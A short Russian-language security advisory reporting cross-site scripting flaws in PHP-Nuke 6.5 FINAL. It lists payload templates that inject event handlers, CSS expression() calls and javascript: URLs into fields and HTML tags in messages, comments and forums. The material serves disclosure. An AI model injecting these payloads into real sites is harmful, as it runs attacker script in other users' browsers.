Несколько XSS уязвимостей обнаружено в PHP-Nuke. Удаленный пользователь может выполнить XSS нападение против PHP-Nuke пользователей. 

Frog-m@n сообщил, что удаленный пользователь может внедрить специально сформированный текст в некоторые поля, чтобы выполнить произвольный код сценария в браузере целевого пользователя. Пример: 

1) http://" onclick="[SCRIPT]

ondblclick, onhelp, onmouseout, onmousemove и другие команды могут быть вставлены вместо 'onclick'.

2) " style="list-style:url(javascript:[SCRIPT]); visibility:hidden;

3) " style="zoom:expression([SCRIPT]); visibility:hidden;

Также, удаленный пользователь может ввести следующий текст в частное сообщение, в комментарии к статьям, в форуме и т.п.: 

<i style="overflow:expression([SCRIPT]);"></i>
<br style="overflow:expression([SCRIPT]);">
<a style="left:expression([SCRIPT]);"></a>
<a style="background:url('javascript:[SCRIPT]');"></a>
<li style="list-style-image:url('javascript:[SCRIPT]');">
<b style="background:url('javascript:[SCRIPT]');"></b>

Другие HTML тэги также уязвимы. 

Уязвимость обнаружена в PHP-Nuke 6.5 FINAL.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии